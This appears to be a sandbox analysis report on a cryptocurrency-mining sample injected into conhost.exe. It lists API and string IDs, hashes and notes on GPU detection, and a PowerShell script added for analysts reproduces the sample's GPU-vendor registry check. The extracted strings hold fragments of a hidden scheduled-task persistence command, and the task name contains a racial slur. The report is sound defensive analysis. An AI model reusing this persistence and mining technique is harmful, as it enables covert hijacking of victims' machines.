                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpywcslen$_wcsicmp
                                                                                        • String ID: %S /run /tn "MINEINEYNIGGA"$%S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$25.<&$5RK\E$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$\BaseNamedObjects\jponrsktoliugglc$\BaseNamedObjects\vcrzstnrtuzplmd$\BaseNamedObjects\vcrzstnrtuzplmd$\Google\Libs\$\MINA\m.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$rce; }$xmr
                                                                                        • API String ID: 9094433-1575734463
                                                                                        • Opcode ID: 70df97cbeb279ce7e503b3156861bbd058356645d432cadd08a0f8bc2809d518
                                                                                        • Instruction ID: 07db7d4ebb8624ca5d8241bef2532af2189fa3486fed02c7137fcf6bf741cba9
                                                                                        • Opcode Fuzzy Hash: 70df97cbeb279ce7e503b3156861bbd058356645d432cadd08a0f8bc2809d518
                                                                                        • Instruction Fuzzy Hash: CFD23E21C1C68399F7137F2FA4423B563E0AF95398F485331DB8C966A3DFAEA1558309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 649803965-0
                                                                                        • Opcode ID: f3100b11892d8d0cbd54530e3a7b5ec9a4463b067f53fdef0f93275959721285
                                                                                        • Instruction ID: bab2944d292321f8d55dbdd71e27a02ac128ccf51f6b28d960814f9250e60af5
                                                                                        • Opcode Fuzzy Hash: f3100b11892d8d0cbd54530e3a7b5ec9a4463b067f53fdef0f93275959721285
                                                                                        • Instruction Fuzzy Hash: 54813A35E1964786EA62BF5FE44177923E1AB55B8CF884035DB0DCB3A3DFACA8548700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcsncmp
                                                                                        • String ID: %S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                                                                        • API String ID: 1181335886-1551201387
                                                                                        • Opcode ID: 63b66c02a5250c84c2a6d9e9a264a3b6df2be75021a1a3a047e22a03b8396f39
                                                                                        • Instruction ID: e018d691d69ac3252983367e4a466dc38ce555ca384d5a7f85aca4bf0a843e2f
                                                                                        • Opcode Fuzzy Hash: 63b66c02a5250c84c2a6d9e9a264a3b6df2be75021a1a3a047e22a03b8396f39
                                                                                        • Instruction Fuzzy Hash: 0A0241229187C285E3229F2EE4403AA73A4FB857A8F444325DBAC976E6DF7DD144C704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcsncmp
                                                                                        • String ID: \BaseNamedObjects\jponrsktoliugglc$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$eth
                                                                                        • API String ID: 1181335886-3458631817
                                                                                        • Opcode ID: 5e9a3772ebf4f86a03212d767f80cdeafa828064f7811bd1c2c85207d59958d7
                                                                                        • Instruction ID: eb3d0a3baa01adcacee1111e49547b58b475ef8707eca792d75da822530dd8d1
                                                                                        • Opcode Fuzzy Hash: 5e9a3772ebf4f86a03212d767f80cdeafa828064f7811bd1c2c85207d59958d7
                                                                                        • Instruction Fuzzy Hash: 7401E962B1864241F221E61BE8007EA67A0AB85BD4F544231FF8C57BD6CFBCD146C704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen
                                                                                        • String ID: 0$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA$eth
                                                                                        • API String ID: 4088430540-800621946
                                                                                        • Opcode ID: 80bcb33a956bf82a5e617cc6086cba7383c96f5024bdab82dfea3568ee60f294
                                                                                        • Instruction ID: 73930db35c87989dda06c16594c33bd29157cf6e26c2ccb8d1dcf168a49bd0ab
                                                                                        • Opcode Fuzzy Hash: 80bcb33a956bf82a5e617cc6086cba7383c96f5024bdab82dfea3568ee60f294
                                                                                        • Instruction Fuzzy Hash: 0F01D622A1868181E7119B55F85179BB7A0EF84768F640331FB9C4AAE6DF7EC581C740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bebafc0cdf615a9abba6b35a8d7a7edf488fde2c98a2736cb098707141f4658
                                                                                        • Instruction ID: b43f0f7a16b9b0ecd39d9aa1bd39ba1b1fc57432894aaa60db99d8ff19574a4b
                                                                                        • Opcode Fuzzy Hash: 7bebafc0cdf615a9abba6b35a8d7a7edf488fde2c98a2736cb098707141f4658
                                                                                        • Instruction Fuzzy Hash: 46F0128BE1EEC389F293516D0C2F25A1FC05B53979F4C427ACBAC822D79DD52D118215
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                        • Instruction ID: b9423e0de1eaf1904f335ad85e55c57491e1066a66b2d5e8bcb9decee6623e27
                                                                                        • Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                                                                        • Instruction Fuzzy Hash: 1CE0B676A08B85818614EB56F48005EBBA4F7D9BC4B504916FECC53B1ACF3CC1A08B40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3ce28f1b288850c35b4b76496f1ee7e5b559d267d7954bb9885d968a0baed50
                                                                                        • Instruction ID: e1e26a2148666b8d64f7924115cf98861ca2ea76020cc3bb4c4de9efc8ecd28d
                                                                                        • Opcode Fuzzy Hash: d3ce28f1b288850c35b4b76496f1ee7e5b559d267d7954bb9885d968a0baed50
                                                                                        • Instruction Fuzzy Hash: 2EA00212C6DD46C4E2011B25DC4617662A8DB06254F046430C11DE54579EACD1524104
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Flattened graph of the function at 7ff6b2971ea0 (entry block 7ff6b2971ea0-7ff6b2971f16, exit 7ff6b297292b-7ff6b2972969); the executed/not-executed colouring is not recoverable in text.
                                                                                        • Imported calls along the graph: memcpy, wcslen, _wcsnicmp, wcsstr.
                                                                                        • Internal calls: 7ff6b2986690, 7ff6b29714f0, 7ff6b29740f9, 7ff6b2974108, 7ff6b2974120, 7ff6b2973fe5.
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$wcslen
                                                                                        • String ID: $0'$0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$PROGRAMFILES=$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                        • API String ID: 1844840824-1551673046
                                                                                        • Opcode ID: d40a7d35b8033e0c9caa4738638b74ada4c7e0bd2bd650a7abbcd8759ce7c2bc
                                                                                        • Instruction ID: 82176fea7c63782db4b45154ae39045396e44b26334088ca364cbb9403f128f8
                                                                                        • Opcode Fuzzy Hash: d40a7d35b8033e0c9caa4738638b74ada4c7e0bd2bd650a7abbcd8759ce7c2bc
                                                                                        • Instruction Fuzzy Hash: 73524E10D2DA8359F713BB2FA4413B463E0AF95398F045335DB8C966A3EFADA195C309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
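The API and String IDs above (memcpy, wcslen, _wcsnicmp, wcsstr together with the display-adapter class GUID {4d36e968-e325-11ce-bfc1-08002be10318}, the value name ProviderName and the vendor strings AMD, ATI, Advanced Micro Devices and NVIDIA) indicate a GPU-vendor probe: the function walks the numbered subkeys of the display-adapter device class and compares each adapter's ProviderName against a short vendor list. The following PowerShell is an added example for reproducing that probe on an analysis host; it is not code from the sample, from XMRig or from the Joe Sandbox report. It assumes the comparison is a case-insensitive prefix match (suggested by the _wcsnicmp calls in the graph) and that the vendor list is exactly the one in the String ID line; the native path \Registry\Machine\SYSTEM\... in the sample maps to the HKLM: drive here.

```powershell
# Added example (not the sample's or the report's code): reproduce the
# display-adapter vendor probe suggested by the strings in the function above.
# Assumptions: case-insensitive prefix compare (as _wcsnicmp would do) and the
# vendor list exactly as it appears in the String ID line.

$DisplayClassGuid = '{4d36e968-e325-11ce-bfc1-08002be10318}'   # Display adapters class (from the sample's strings)
$ClassKey = "HKLM:\SYSTEM\CurrentControlSet\Control\Class\$DisplayClassGuid"

# Vendor prefixes taken from the String ID line of the function above.
$VendorPrefixes = @('AMD', 'ATI', 'Advanced Micro Devices', 'NVIDIA')

function Get-GpuVendorFromProvider {
    param([string]$ProviderName)
    foreach ($prefix in $VendorPrefixes) {
        # Equivalent of _wcsnicmp(providerName, prefix, wcslen(prefix)) == 0
        if ($ProviderName.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
            return $prefix
        }
    }
    return $null
}

function Get-DisplayAdapterVendors {
    # Each four-digit subkey (0000, 0001, ...) is one adapter instance; the
    # Properties subkey and others are skipped by the name filter.
    Get-ChildItem -Path $ClassKey -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d{4}$' } |
        ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Instance     = $_.PSChildName
                ProviderName = $props.ProviderName
                DriverDesc   = $props.DriverDesc
                Vendor       = Get-GpuVendorFromProvider -ProviderName ([string]$props.ProviderName)
            }
        }
}

$adapters = Get-DisplayAdapterVendors
$adapters | Format-Table -AutoSize

if (-not ($adapters | Where-Object { $_.Vendor })) {
    Write-Host 'No adapter with an AMD/ATI/NVIDIA ProviderName: the sample would find no matching GPU on this host.'
}
```

The class key is readable by a standard user, so no elevation is needed. On a sandbox or VM whose only display adapter is a virtual one (ProviderName such as Microsoft or the hypervisor vendor) no prefix matches, which is the outcome this sample would have seen in the analysis environment; when comparing behaviour on a host with a physical AMD or NVIDIA card, run the same probe there first so that differences in the sample's execution can be attributed to the GPU check rather than to something else.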

                                                                                        Control-flow Graph

                                                                                        • Flattened graph of the function at 7ff6b297ee50 (entry block 7ff6b297ee50-7ff6b297ee65); the executed/not-executed colouring is not recoverable in text.
                                                                                        • Imported calls along the graph: malloc, calloc, realloc, memset, memcpy, abort, CreateSemaphoreW, ReleaseSemaphore, WaitForSingleObject, TlsAlloc, TlsGetValue, TlsSetValue, GetLastError, SetLastError, Sleep.
                                                                                        • Internal calls: 7ff6b29867f0, 7ff6b297eef0, and a recursive call to 7ff6b297ee50.
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 342303811-0
                                                                                        • Opcode ID: 9540ecb44eb3dad323a813c296351d8f7464fd56d16fa0a9472f623535802938
                                                                                        • Instruction ID: fb347c600d898995e2331b443db31d91ebe47f85c64c2c6733768ea53fc5cdf9
                                                                                        • Opcode Fuzzy Hash: 9540ecb44eb3dad323a813c296351d8f7464fd56d16fa0a9472f623535802938
                                                                                        • Instruction Fuzzy Hash: 4C918131A0964385EA17BF2BA80467923E1AF44B9CF584438DB4D977A7DFBCE8568301
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                        • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                        • API String ID: 802779101-808685626
                                                                                        • Opcode ID: ae96ca8ce978ed83f0410bb1cf3242792faa4f94d5cdb185b9dcf52c569558b0
                                                                                        • Instruction ID: a2ad271b12f5e4c176f64043173c1a824efe8d77513e3a524847ecfafd8eb4a0
                                                                                        • Opcode Fuzzy Hash: ae96ca8ce978ed83f0410bb1cf3242792faa4f94d5cdb185b9dcf52c569558b0
                                                                                        • Instruction Fuzzy Hash: B141CE14B1915745FA16B7ABA8293B906C1AF89BC8F0C4139DB0ECF7D7EEACE4018311
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaiseUnwindabort
                                                                                        • String ID: CCG $CCG!$CCG!$CCG"
                                                                                        • API String ID: 4140830120-3707373406
                                                                                        • Opcode ID: 3e6441376f4647d330057410b5d8a81e19eae72e31a5c50abc30cdc984ccff24
                                                                                        • Instruction ID: 619fbc82965ad60b17b254c5212eae3825225ecc17770dbb29de5f43b4c57993
                                                                                        • Opcode Fuzzy Hash: 3e6441376f4647d330057410b5d8a81e19eae72e31a5c50abc30cdc984ccff24
                                                                                        • Instruction Fuzzy Hash: 4851B033A08B8282E7619B1AE4446A973B0F789B98F544136EFCD53769DF78D582C701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Flattened graph of the function at 7ff6b297c2f0 (entry block 7ff6b297c2f0-7ff6b297c31b); the executed/not-executed colouring is not recoverable in text.
                                                                                        • Imported calls along the graph: strncmp, strlen.
                                                                                        • Internal calls: 7ff6b297e3e0, 7ff6b2974e60, 7ff6b29771a0, 7ff6b2977c10, 7ff6b2974150, 7ff6b29744d0, 7ff6b297af30, 7ff6b2974250.
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlenstrncmp
                                                                                        • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                        • API String ID: 1310274236-662103887
                                                                                        • Opcode ID: c914cae3b5cf8efe83334340236a7be40f521ae75959e789acde5be847f17d48
                                                                                        • Instruction ID: aa0431dbf937279565b58f999ffb221ee40ba3bb1ae222b892e1b35837a18f8e
                                                                                        • Opcode Fuzzy Hash: c914cae3b5cf8efe83334340236a7be40f521ae75959e789acde5be847f17d48
                                                                                        • Instruction Fuzzy Hash: 3FE1C172A0868389F7229F3A98043FD3BE1BB0479CF544231DB6C9A796DF7D96458700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                         Control-flow Graph
                                                                                         • Rendered graph omitted (node/edge list only). Recoverable detail: basic blocks span 7ff6b297db86 to 7ff6b297dd62; several blocks call signal; block 7ff6b297dc48-7ff6b297dc5c calls signal and then 7ff6b297d540; block 7ff6b297dcd5-7ff6b297dce5 calls 7ff6b29866a8.
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                         • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmp
                                                                                         • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: signal
                                                                                        • String ID: CCG
                                                                                        • API String ID: 1946981877-1584390748
                                                                                        • Opcode ID: 49b0dc0c814c919c10a99f5bf63d3d6ab85b0b9d6c9724e6b01ec1ffaef6101b
                                                                                        • Instruction ID: b1d24f9d3793ffe51eded5d037ffe0f2a479f706057e015a734ffed006092669
                                                                                        • Opcode Fuzzy Hash: 49b0dc0c814c919c10a99f5bf63d3d6ab85b0b9d6c9724e6b01ec1ffaef6101b
